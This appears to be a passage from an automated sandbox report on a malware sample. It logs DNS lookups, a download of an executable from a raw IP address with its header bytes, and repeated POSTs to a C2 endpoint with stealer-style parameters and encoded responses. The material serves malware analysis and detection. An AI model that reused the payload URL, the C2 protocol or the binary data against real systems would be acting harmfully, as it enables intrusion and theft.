                                                                                                                                                                                                Nov 23, 2024 16:53:45.777770042 CET1.1.1.1192.168.2.40x8249No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.777770042 CET1.1.1.1192.168.2.40x8249No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.778450966 CET1.1.1.1192.168.2.40xaca0No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.778450966 CET1.1.1.1192.168.2.40xaca0No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:45.986296892 CET1.1.1.1192.168.2.40x52d5No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096060991 CET1.1.1.1192.168.2.40x5265No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096060991 CET1.1.1.1192.168.2.40x5265No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096060991 CET1.1.1.1192.168.2.40x5265No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.074503899 CET1.1.1.1192.168.2.40x3423No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.074503899 CET1.1.1.1192.168.2.40x3423No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.074503899 CET1.1.1.1192.168.2.40x3423No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.074503899 CET1.1.1.1192.168.2.40x3423No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.075308084 CET1.1.1.1192.168.2.40x61c4No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.075308084 CET1.1.1.1192.168.2.40x61c4No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.400587082 CET1.1.1.1192.168.2.40x8d1bNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.400681019 CET1.1.1.1192.168.2.40xe400No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.400681019 CET1.1.1.1192.168.2.40xe400No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:49.400681019 CET1.1.1.1192.168.2.40xe400No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:55.079327106 CET1.1.1.1192.168.2.40x17ceNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:53:55.236253977 CET1.1.1.1192.168.2.40xe52eNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:54:00.307213068 CET1.1.1.1192.168.2.40x404bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:54:00.315992117 CET1.1.1.1192.168.2.40xc33eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:54:07.361115932 CET1.1.1.1192.168.2.40x1d5cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 23, 2024 16:54:07.366862059 CET1.1.1.1192.168.2.40xcd97No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                • property-imper.sbs
                                                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                                                • fs.microsoft.com
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • js.monitor.azure.com
                                                                                                                                                                                                  • wcpstatic.microsoft.com
                                                                                                                                                                                                • otelrules.azureedge.net
                                                                                                                                                                                                • 185.215.113.16
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.449744185.215.113.16804280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Nov 23, 2024 16:53:26.766813993 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208677053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:27 GMT
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Content-Length: 2803712
                                                                                                                                                                                                Last-Modified: Sat, 23 Nov 2024 15:27:00 GMT
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                ETag: "6741f444-2ac800"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 b2 59 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@+ `@ +Y+`Ui` @ @.rsrc`2@.idata 8@vbqisocr*h*:@fkbmxbkg +*@.taggant@@+"*@
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208751917 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208786964 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208821058 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208856106 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208890915 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208926916 CET744INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208961010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208996058 CET224INData Raw: 82 ad bf 91 61 b1 24 64 51 cf 86 04 91 12 d2 3c a1 54 96 5c a5 87 23 d6 79 7f d8 7d 0f c1 82 5e 3c 58 a5 4d 60 38 c4 1a 16 b1 69 48 6b c8 b2 89 61 b6 9a d5 6e 48 d2 ad fc dc be df 28 8e c9 01 07 be 96 75 97 0a 41 c0 32 3c bf cb 97 cd c4 45 b3 76
                                                                                                                                                                                                Data Ascii: a$dQ<T\#y}^<XM`8iHkanH(uA2<Ev@7{DrjYJWz{^5t4-^|Wm;B{xVB ZdobI_o
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209026098 CET1236INData Raw: 7e ec e3 cf c3 32 22 e8 c0 bb c7 b7 a7 bc 5d e1 ae 93 a9 a1 b1 c5 af d5 b2 e6 c1 58 8a d4 c0 cd 51 dc 57 0e 79 a7 60 2b 1b 6d c0 57 7b 87 c3 c9 61 94 aa 40 15 84 96 5f 8d a1 9a e1 aa 89 47 3a f1 d8 db 71 99 16 0c 24 01 4b 38 9c 37 0f 83 cd 4d 02
                                                                                                                                                                                                Data Ascii: ~2"]XQWy`+mW{a@_G:q$K87MWDD9QPYIta`K|>.2?<Eq{wi\S/Y|]\ylD6ZYxptA86>rg;
                                                                                                                                                                                                Nov 23, 2024 16:53:28.328835011 CET1236INData Raw: 8d c2 5c b2 2d 3b 74 35 b1 5a d2 07 5c 54 7a aa 58 53 08 5d d2 64 8d 23 62 e7 65 ee ad 8f dd 03 ef dc fd 07 39 77 4a fd 96 44 9a 46 3b 56 2c fd 94 44 62 d6 32 fe 88 0d 97 9a 6b 40 a7 5f 27 e0 05 e5 f7 43 01 53 db df 3e de 46 4e 41 c0 f0 e0 2b 72
                                                                                                                                                                                                Data Ascii: \-;t5Z\TzXS]d#be9wJDF;V,Db2k@_'CS>FNA+r{=4sbu@pec|jpb;bsU5[V8zpr8cniFz(S7mkO^W@ASy)O@ST/(]SHvYF=/qk|sTSIb


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.449730172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:04 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                2024-11-23 15:53:05 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:05 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=snd62kf9l3f8is9ibhva00o3qh; expires=Wed, 19-Mar-2025 09:39:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKaTF%2BSyyDNsQd9wU6Jlw5CxPAmz0Md8zCvZhL7Z9CZAmJDPaNVZHKp0BgwDxfRGKHYXr7JPoJJlhfM9Quvjgt0SIpyU%2FE2f%2FD4gqdLJCzwD3xOnFUdZ2%2B2st2QDYRBQUvSmAHY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e72547e39c74303-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1289183&cwnd=233&unsent_bytes=0&cid=61a42e4281e1f5f8&ts=702&x=0"
                                                                                                                                                                                                2024-11-23 15:53:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                2024-11-23 15:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.449731172.67.162.844434280C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:06 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                Host: property-imper.sbs
                                                                                                                                                                                                2024-11-23 15:53:06 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:07 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=04b2b73jkp7ks4u73mrn6rrdll; expires=Wed, 19-Mar-2025 09:39:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1CP2ycsa8NHUJ1Xk%2FEHiabLAPo0cCt0HqSGf44Lh1KSd6TAeQmgnOmmd6YNq%2FNcwB690WySvvef0JsQ%2Bz%2FvKleJiBKNMDqxl3%2FGl39bnJrVEglRzfL30wk5HsftwlhxjlHKIyQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e72548bacf5191e-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1494&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1947965&cwnd=238&unsent_bytes=0&cid=bcbe86daaefc1f03&ts=736&x=0"
                                                                                                                                                                                                2024-11-23 15:53:07 UTC352INData Raw: 31 64 39 33 0d 0a 76 66 50 6e 6d 49 59 77 64 65 32 45 4e 39 32 6b 7a 2f 66 43 77 6b 75 38 53 74 73 70 76 48 55 73 2b 6f 66 4e 39 47 44 33 43 38 48 47 30 5a 47 36 76 41 52 5a 7a 2f 64 53 2f 35 36 37 68 62 65 6e 5a 35 34 72 76 77 75 47 45 30 32 57 39 4b 6a 59 51 6f 46 6d 34 34 65 56 68 76 54 31 56 56 6e 50 34 55 2f 2f 6e 70 53 4d 34 4b 63 6c 6e 6e 44 35 54 4e 59 58 54 5a 62 6c 72 4a 38 50 68 32 65 69 31 5a 2b 41 38 4f 4e 54 45 59 7a 6f 57 72 6a 42 71 70 61 6f 72 43 4c 52 49 72 59 4c 6b 46 64 4a 67 4b 58 33 31 69 32 53 66 36 44 77 6b 70 54 7a 70 45 31 5a 6c 71 5a 53 73 34 62 31 31 61 4f 6e 4b 64 41 73 76 30 4c 55 48 55 53 65 35 4b 6d 65 45 4a 35 74 71 64 57 52 67 2f 48 70 57 67 57 42 34 6c 32 7a 78 36 43 57 34 4f 35 70 32 54 44 35 45 35 35 45 66 4a 76 30 76
                                                                                                                                                                                                Data Ascii: 1d93vfPnmIYwde2EN92kz/fCwku8StspvHUs+ofN9GD3C8HG0ZG6vARZz/dS/567hbenZ54rvwuGE02W9KjYQoFm44eVhvT1VVnP4U//npSM4KclnnD5TNYXTZblrJ8Ph2ei1Z+A8ONTEYzoWrjBqpaorCLRIrYLkFdJgKX31i2Sf6DwkpTzpE1ZlqZSs4b11aOnKdAsv0LUHUSe5KmeEJ5tqdWRg/HpWgWB4l2zx6CW4O5p2TD5E55EfJv0v
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 54 6c 58 78 65 64 37 6c 36 30 77 37 2b 65 71 61 30 6b 33 69 57 7a 52 4e 30 58 53 5a 4c 76 6f 4a 77 47 6d 47 53 6c 33 35 48 46 74 4b 52 56 44 38 2b 2b 46 5a 7a 44 76 5a 4b 73 74 6d 76 6b 61 4b 59 46 78 31 64 4a 6c 4b 58 33 31 67 71 51 61 71 44 55 6e 6f 62 79 37 30 41 58 6e 65 42 59 75 74 53 72 6b 4b 36 71 4b 73 77 69 74 30 33 64 48 6b 57 52 34 4b 69 53 51 74 73 70 70 4d 66 52 33 62 72 46 58 78 79 44 37 45 4b 2f 68 72 4c 62 75 65 41 75 30 6d 6a 68 43 39 6f 57 53 70 6e 68 6f 5a 67 47 6d 57 2b 74 30 70 36 44 38 4f 52 56 48 59 66 75 56 4c 4c 4e 6f 70 57 6c 72 53 33 59 4a 4c 68 4f 6e 6c 6b 4f 6e 2f 33 76 7a 6b 4b 37 62 71 44 4e 30 37 44 35 36 6c 77 51 6d 61 5a 4b 38 64 2f 74 6b 71 7a 67 63 5a 34 6d 76 45 54 4d 46 6c 79 64 36 37 32 61 42 35 4e 6b 6f 4e 47 52 67
                                                                                                                                                                                                Data Ascii: TlXxed7l60w7+eqa0k3iWzRN0XSZLvoJwGmGSl35HFtKRVD8++FZzDvZKstmvkaKYFx1dJlKX31gqQaqDUnoby70AXneBYutSrkK6qKswit03dHkWR4KiSQtsppMfR3brFXxyD7EK/hrLbueAu0mjhC9oWSpnhoZgGmW+t0p6D8ORVHYfuVLLNopWlrS3YJLhOnlkOn/3vzkK7bqDN07D56lwQmaZK8d/tkqzgcZ4mvETMFlyd672aB5NkoNGRg
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 51 6d 61 5a 4b 38 64 2f 74 6b 71 7a 67 63 5a 34 6b 73 45 76 56 48 55 71 59 34 71 4b 54 41 5a 4a 71 72 74 69 62 69 2f 33 67 58 68 36 43 34 46 57 34 77 71 69 48 70 61 6b 6c 30 6d 6a 33 43 39 6b 50 44 73 43 6c 67 4a 45 55 6c 6b 61 67 7a 70 6a 46 35 61 70 4c 56 34 6a 71 46 65 65 47 71 70 43 6f 71 79 2f 57 4b 4b 74 4f 30 42 78 50 6b 75 4f 75 6d 77 36 54 61 61 4c 66 6c 34 6e 36 34 31 55 46 6e 65 4e 54 72 63 7a 74 32 2b 43 6e 4d 5a 35 77 2b 58 33 4f 41 46 2b 4f 70 35 71 56 44 4a 74 75 74 5a 2b 4f 79 2b 4f 6b 56 52 76 50 76 68 57 30 78 71 47 53 71 4b 59 74 31 69 65 32 51 73 77 57 51 70 62 33 71 4a 59 4c 6d 32 61 76 31 70 79 43 39 2b 39 59 47 6f 76 68 56 50 2b 49 37 5a 4b 34 34 48 47 65 48 71 6c 47 30 6a 6c 46 6c 4f 7a 76 69 55 79 4d 4b 61 54 54 30 64 32 36 34 46
                                                                                                                                                                                                Data Ascii: QmaZK8d/tkqzgcZ4ksEvVHUqY4qKTAZJqrtibi/3gXh6C4FW4wqiHpakl0mj3C9kPDsClgJEUlkagzpjF5apLV4jqFeeGqpCoqy/WKKtO0BxPkuOumw6TaaLfl4n641UFneNTrczt2+CnMZ5w+X3OAF+Op5qVDJtutZ+Oy+OkVRvPvhW0xqGSqKYt1ie2QswWQpb3qJYLm2av1pyC9+9YGovhVP+I7ZK44HGeHqlG0jlFlOzviUyMKaTT0d264F
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 55 62 72 44 71 5a 4b 6b 70 69 61 65 5a 76 6c 4d 78 6c 63 57 32 4d 71 49 6f 30 43 30 55 2b 50 41 33 35 79 36 34 31 35 58 31 36 5a 5a 76 4d 71 6c 6d 71 61 70 4a 64 51 68 73 6b 66 56 45 30 4b 52 34 4b 6d 58 42 35 42 6f 70 39 4f 62 67 2f 6e 6e 58 52 69 41 37 68 58 78 68 71 71 4e 34 50 68 70 2b 7a 2b 79 52 64 68 58 55 64 62 38 37 35 45 4f 31 54 48 6a 30 35 69 44 2f 4f 46 65 46 6f 6e 75 55 4c 66 43 72 4a 4f 6d 6f 79 62 61 4c 62 68 45 32 68 74 41 6b 75 53 75 6d 67 6d 61 59 71 61 66 33 38 58 39 2f 42 4a 50 7a 39 64 57 71 64 47 39 6d 65 43 2f 5a 38 64 6f 76 6b 65 65 54 77 36 5a 39 36 57 63 44 4a 42 6d 70 74 79 65 67 76 66 69 58 68 32 47 37 6c 4f 77 7a 37 2b 57 72 4b 34 75 30 43 53 33 52 74 51 55 51 39 69 72 37 35 45 61 31 54 48 6a 38 35 61 49 31 4f 39 65 45 4d 2f
                                                                                                                                                                                                Data Ascii: UbrDqZKkpiaeZvlMxlcW2MqIo0C0U+PA35y6415X16ZZvMqlmqapJdQhskfVE0KR4KmXB5Bop9Obg/nnXRiA7hXxhqqN4Php+z+yRdhXUdb875EO1THj05iD/OFeFonuULfCrJOmoybaLbhE2htAkuSumgmaYqaf38X9/BJPz9dWqdG9meC/Z8dovkeeTw6Z96WcDJBmptyegvfiXh2G7lOwz7+WrK4u0CS3RtQUQ9ir75Ea1THj85aI1O9eEM/
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 75 50 56 70 37 68 70 68 6d 69 50 54 4d 34 48 54 64 72 55 75 5a 55 55 6e 6d 53 76 6e 34 37 4c 34 36 52 56 47 38 2b 2b 46 62 6e 4a 70 4a 61 76 6f 53 44 53 4a 62 78 43 32 78 5a 49 6e 4f 2b 6c 6c 67 53 54 61 4b 62 56 6b 6f 54 77 37 56 55 66 69 4f 56 48 2f 34 6a 74 6b 72 6a 67 63 5a 34 42 76 6c 6e 51 42 77 36 48 71 37 62 57 42 5a 6b 70 2b 35 2b 56 6a 2f 58 67 56 52 75 4a 34 31 4f 79 78 36 4b 55 6f 4b 38 74 31 53 47 2f 53 74 4d 53 51 35 7a 33 70 5a 30 4e 6d 57 43 76 30 74 48 4c 75 75 4e 4b 56 39 65 6d 5a 4c 4c 49 6f 35 4b 32 34 44 61 51 4d 66 6c 4d 30 6c 63 57 32 4f 53 6a 6d 51 47 61 61 71 44 65 6d 35 66 6f 36 46 73 66 69 75 70 65 73 63 43 2f 6b 36 2b 70 4b 74 30 68 76 6b 50 53 48 55 32 66 70 65 48 57 42 59 30 70 2b 35 2b 79 6b 75 72 70 45 67 6a 42 2f 78 57 34
                                                                                                                                                                                                Data Ascii: uPVp7hphmiPTM4HTdrUuZUUnmSvn47L46RVG8++FbnJpJavoSDSJbxC2xZInO+llgSTaKbVkoTw7VUfiOVH/4jtkrjgcZ4BvlnQBw6Hq7bWBZkp+5+Vj/XgVRuJ41Oyx6KUoK8t1SG/StMSQ5z3pZ0NmWCv0tHLuuNKV9emZLLIo5K24DaQMflM0lcW2OSjmQGaaqDem5fo6FsfiupescC/k6+pKt0hvkPSHU2fpeHWBY0p+5+ykurpEgjB/xW4
                                                                                                                                                                                                2024-11-23 15:53:07 UTC1369INData Raw: 61 75 4f 39 73 75 74 6b 54 58 48 6b 71 51 35 71 2b 53 42 70 4a 73 6f 4e 4f 61 67 76 6e 72 56 68 36 42 37 31 72 2f 69 4f 32 53 75 4f 42 78 6e 67 6d 69 53 4e 49 61 44 6f 65 72 74 74 59 46 6d 53 6e 37 6e 35 32 4c 2f 2b 52 59 45 59 76 6a 55 37 58 44 72 5a 36 6a 72 79 33 59 4c 4c 5a 4c 31 52 35 50 6e 75 43 6c 6e 51 53 59 61 71 58 5a 30 63 75 36 34 30 70 58 31 36 5a 31 70 4d 75 68 6b 75 43 2f 5a 38 64 6f 76 6b 65 65 54 77 36 54 36 61 75 52 41 70 68 71 71 39 71 56 6a 2f 2f 6b 57 67 57 48 35 6c 4b 74 31 4b 32 63 70 61 77 71 33 69 79 2f 51 74 67 55 53 74 69 72 37 35 45 61 31 54 48 6a 38 70 32 43 30 2b 4e 4a 56 35 43 6f 54 50 2f 42 6f 64 58 34 34 43 6a 56 49 72 5a 47 33 52 46 4e 6b 2b 43 6c 6c 77 57 64 5a 4c 48 63 6e 6f 72 2b 35 46 30 52 69 65 64 61 75 63 47 6b 6c
